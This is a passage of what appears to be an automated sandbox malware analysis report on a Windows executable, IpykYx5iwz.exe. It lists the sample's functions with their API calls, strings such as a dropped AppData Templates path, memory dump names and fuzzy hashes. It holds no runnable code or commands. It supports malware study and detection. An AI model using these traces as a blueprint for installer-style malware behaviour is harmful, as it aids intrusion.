Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
Instruction ID: 88055a129495e0a1532d88cdf268e4fa11f8ad8fa0993c615db816ddd8659a66
Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
Instruction Fuzzy Hash: CEE0EC3221065AABDF909F559C04AEB7B6CEF45360F008837F915E6150D635E8219BA8

Function 73402921 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(7340404C,00000004,00000040,7340403C), ref: 7340293F

Memory Dump Source

Source File: 00000000.00000002.1818278382.0000000073401000.00000020.00000001.01000000.00000006.sdmp, Offset: 73400000, based on PE: true

Associated: 00000000.00000002.1818246559.0000000073400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1818304122.0000000073403000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1818325879.0000000073405000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73400000_IpykYx5iwz.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: c47cced69bbd12c552915adf438287690655833c53fb04bb2af044cd6c7d3f8f
Instruction ID: 194e7506b5679330f4da3d7234d5364175c081c3201ec86eb9967898fd119bed
Opcode Fuzzy Hash: c47cced69bbd12c552915adf438287690655833c53fb04bb2af044cd6c7d3f8f
Instruction Fuzzy Hash: 41F092B37092A0DED368FF6A87447063EE4A399359F21A5EAE59CF6382E33440448F15

Function 004023A7 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004023DA

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 43d1ef68d34db13a5b9bb34e680415942fdcff1b2a8b4def309f1089b099fd68
Instruction ID: 613f8938e3483f022966d8f88ece12aded35770f19abf94ca1dc8db90175e5cf
Opcode Fuzzy Hash: 43d1ef68d34db13a5b9bb34e680415942fdcff1b2a8b4def309f1089b099fd68
Instruction Fuzzy Hash: 28E01A30904309BADB016FB08D09EBE3E79EF05710F10042AB9506A0D2E6B89542971D

Function 00405FC7 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00406055,?,?,?,?,00000002,Call), ref: 00405FEB

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction ID: a79ed491604e732be9e8589d5993cb0c6093b0d914abb251d3aa64a9826405fb
Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction Fuzzy Hash: F2D0123200420EBBDF119E90DD01FAB371DEB04350F104426FE16A4191D77AD930AF24

Function 0040159D Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: cadbb60fad11aca41fa8821db0c0d6396017327b99a71bfa173ef47d4dea764f
Instruction ID: 414020ceaf1b9bfe3b374f8d441e9348849d88ca446d9646f494e55c126a457c
Opcode Fuzzy Hash: cadbb60fad11aca41fa8821db0c0d6396017327b99a71bfa173ef47d4dea764f
Instruction Fuzzy Hash: 09D0127270420097CB11DFA8EB08A5D77A5EB55325F210537D111F21D1D2B885459759

Function 0040421B Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00010450,00000000,00000000,00000000), ref: 0040422D

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 36dc9921a482444c8f32a3e2d649131ff3b3bcc632906422d004d469ccc3c4a4
Instruction ID: 212e39722ed4517457d92134c98ec16180e1b8b542dfb9669583df3824257a50
Opcode Fuzzy Hash: 36dc9921a482444c8f32a3e2d649131ff3b3bcc632906422d004d469ccc3c4a4
Instruction Fuzzy Hash: 60C04C717406017AEA208B509D49F0677686B50741F2544697660A60D4C6B4D510DA1D

Function 00404204 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000028,?,00000001,00404034), ref: 00404212

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 1c02a5868d14bc1e19ebeed3d404449871defacebd96b9282790bb16d711c782
Instruction ID: 10cfd25431557a88665167ebbf17620150c727a9bd7140e907e4ecff4ccdfc3e
Opcode Fuzzy Hash: 1c02a5868d14bc1e19ebeed3d404449871defacebd96b9282790bb16d711c782
Instruction Fuzzy Hash: 30B09236280A00AAEE218B00DE09F457AA2E7A8742F028028B250240B0CAB200A1DB08

Function 0040333C Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040303A,?), ref: 0040334A

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: af556f1437a27586b8d302be8c6d190c2fb2fb51029204f11d8d070fc2108142
Instruction ID: 81fdcbbc46e9ac73494c3809a02cbb86869920566b24394b282a4516d046c7b0
Opcode Fuzzy Hash: af556f1437a27586b8d302be8c6d190c2fb2fb51029204f11d8d070fc2108142
Instruction Fuzzy Hash: 32B01231140300BFDA214F00DF09F057B21AB90700F10C034B384780F086711075EB0D

Function 004041F1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403FCD), ref: 004041FB

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 170f1306ebf328c26108ef1010d48ef1549a1a3b4841237e6a0462b6e89b4d13
Instruction ID: bd711969ba89efe8629f231cafa01baa053f2358784498ab8b3cf30639ef5a41
Opcode Fuzzy Hash: 170f1306ebf328c26108ef1010d48ef1549a1a3b4841237e6a0462b6e89b4d13
Instruction Fuzzy Hash: 55A012320000009FCB014B50EF04C057F71AB543007018435E140400338A310821FF0C

Non-executed Functions

Function 00404661 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 004046B0
SetWindowTextA.USER32(00000000,?), ref: 004046DA
SHBrowseForFolderA.SHELL32(?,00420108,?), ref: 0040478B
CoTaskMemFree.OLE32(00000000), ref: 00404796
lstrcmpiA.KERNEL32(Call,helsidesannoncen: Installing), ref: 004047C8
lstrcatA.KERNEL32(?,Call), ref: 004047D4
SetDlgItemTextA.USER32(?,000003FB,?), ref: 004047E6

Part of subcall function 00405841: GetDlgItemTextA.USER32(?,?,00000400,0040481D), ref: 00405854

Part of subcall function 004063AB: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\IpykYx5iwz.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,0040335F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403596,?,00000006,00000008,0000000A), ref: 00406403
Part of subcall function 004063AB: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406410
Part of subcall function 004063AB: CharNextA.USER32(?,"C:\Users\user\Desktop\IpykYx5iwz.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,0040335F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403596,?,00000006,00000008,0000000A), ref: 00406415
Part of subcall function 004063AB: CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,0040335F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403596,?,00000006,00000008,0000000A), ref: 00406425

GetDiskFreeSpaceA.KERNEL32(0041FD00,?,?,0000040F,?,0041FD00,0041FD00,?,00000001,0041FD00,?,?,000003FB,?), ref: 004048A4
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004048BF

Part of subcall function 00404A18: lstrlenA.KERNEL32(helsidesannoncen: Installing,helsidesannoncen: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404933,000000DF,00000000,00000400,?), ref: 00404AB6
Part of subcall function 00404A18: wsprintfA.USER32 ref: 00404ABE
Part of subcall function 00404A18: SetDlgItemTextA.USER32(?,helsidesannoncen: Installing), ref: 00404AD1

Strings

Call, xrefs: 004047C2, 004047C7, 004047D2
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness, xrefs: 004047B1
A, xrefs: 00404784
r%[, xrefs: 0040491B
helsidesannoncen: Installing, xrefs: 0040475E, 004047C1

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness$Call$helsidesannoncen: Installing$r%[
API String ID: 2624150263-2967769108
Opcode ID: feef0b7677b7d06d70c459e9e34dcff38cc359754695d52e5d11696bdf2dcbe7
Instruction ID: 834555d72061076239680e6a84f3316086c58123263e9301e374821f8ce8aa56
Opcode Fuzzy Hash: feef0b7677b7d06d70c459e9e34dcff38cc359754695d52e5d11696bdf2dcbe7
Instruction Fuzzy Hash: 5FA150F1900209ABDB11AFA5CD85AAFB7B8EF84314F10843BF611B62D1D77C99418B6D

Function 00402138 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00408410,?,00000001,00408400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021BA
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402269

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness, xrefs: 004021FA

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness
API String ID: 123533781-3736904667
Opcode ID: 17fd2ade8be4bdb53efd74d8c5b9758c57b7155208c8c74f01d8dca469d712fe
Instruction ID: 42eae1ebd03e9fd6b26160c2fd50ec5606117bc8341cdde2c537feddc8103cc1
Opcode Fuzzy Hash: 17fd2ade8be4bdb53efd74d8c5b9758c57b7155208c8c74f01d8dca469d712fe
Instruction Fuzzy Hash: 5A510771A00209AFCB04DFE4C988A9DBBB5FF48314F2085AAF915EB2D1DB799941CB54

Function 00402765 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402774

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 16b40471c57f536beacf62a3d2796703244d68fd346794bdeae6274ae2267cc6
Instruction ID: 3eaeeeab6897ad977a93c11785c20aea7c68224255535dddcb341d561440b3f0
Opcode Fuzzy Hash: 16b40471c57f536beacf62a3d2796703244d68fd346794bdeae6274ae2267cc6
Instruction Fuzzy Hash: ACF0E5726441009BD301EBB49A49AFEB76CEF12324F60017BE241F21C1D7B88995D76A

Function 00404BD4 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404BEB
GetDlgItem.USER32(?,00000408), ref: 00404BF8
GlobalAlloc.KERNEL32(00000040,?), ref: 00404C47
LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404C5E
SetWindowLongA.USER32(?,000000FC,004051DC), ref: 00404C78
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C8A
ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C9E
SendMessageA.USER32(?,00001109,00000002), ref: 00404CB4
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404CC0
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404CD0
DeleteObject.GDI32(00000110), ref: 00404CD5
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404D00
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404D0C
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404DA6
SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404DD6

Part of subcall function 00404204: SendMessageA.USER32(00000028,?,00000001,00404034), ref: 00404212

SendMessageA.USER32(?,00001100,00000000,?), ref: 00404DEA
GetWindowLongA.USER32(?,000000F0), ref: 00404E18
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404E26
ShowWindow.USER32(?,00000005), ref: 00404E36
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404F31
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F96
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404FAB
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404FCF
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404FEF
ImageList_Destroy.COMCTL32(00000000), ref: 00405004
GlobalFree.KERNEL32(00000000), ref: 00405014
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 0040508D
SendMessageA.USER32(?,00001102,?,?), ref: 00405136
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00405145
InvalidateRect.USER32(?,00000000,00000001), ref: 00405165
ShowWindow.USER32(?,00000000), ref: 004051B3
GetDlgItem.USER32(?,000003FE), ref: 004051BE
ShowWindow.USER32(00000000), ref: 004051C5

Strings

M, xrefs: 00404D8E
r%[, xrefs: 0040516B
N, xrefs: 00404E6F
, xrefs: 0040519D

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N$r%[
API String ID: 2564846305-730436572
Opcode ID: 45c90deb201e3df7399da6381468d2f9a17c1b7f01ece252526a3f8d42b7c933
Instruction ID: e03921bd6c6e4a37bdfb411e954e05a497c968e6c467d94503d0be5cca2fcafc
Opcode Fuzzy Hash: 45c90deb201e3df7399da6381468d2f9a17c1b7f01ece252526a3f8d42b7c933
Instruction Fuzzy Hash: 7E024CB0A00209AFDF209F94DD45AAE7BB5FB84354F10813AF610BA2E1D7799D42DF58

Function 0040433A Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 202windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004043C5
GetDlgItem.USER32(00000000,000003E8), ref: 004043D9
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004043F7
GetSysColor.USER32(?), ref: 00404408
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404417
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404426
lstrlenA.KERNEL32(?), ref: 00404429
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404438
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040444D
GetDlgItem.USER32(?,0000040A), ref: 004044AF
SendMessageA.USER32(00000000), ref: 004044B2
GetDlgItem.USER32(?,000003E8), ref: 004044DD
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040451D
LoadCursorA.USER32(00000000,00007F02), ref: 0040452C
SetCursor.USER32(00000000), ref: 00404535
LoadCursorA.USER32(00000000,00007F00), ref: 0040454B
SetCursor.USER32(00000000), ref: 0040454E
SendMessageA.USER32(00000111,00000001,00000000), ref: 0040457A
SendMessageA.USER32(00000010,00000000,00000000), ref: 0040458E

Strings

Call, xrefs: 00404508
N, xrefs: 004044CB
r%[, xrefs: 0040435A

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

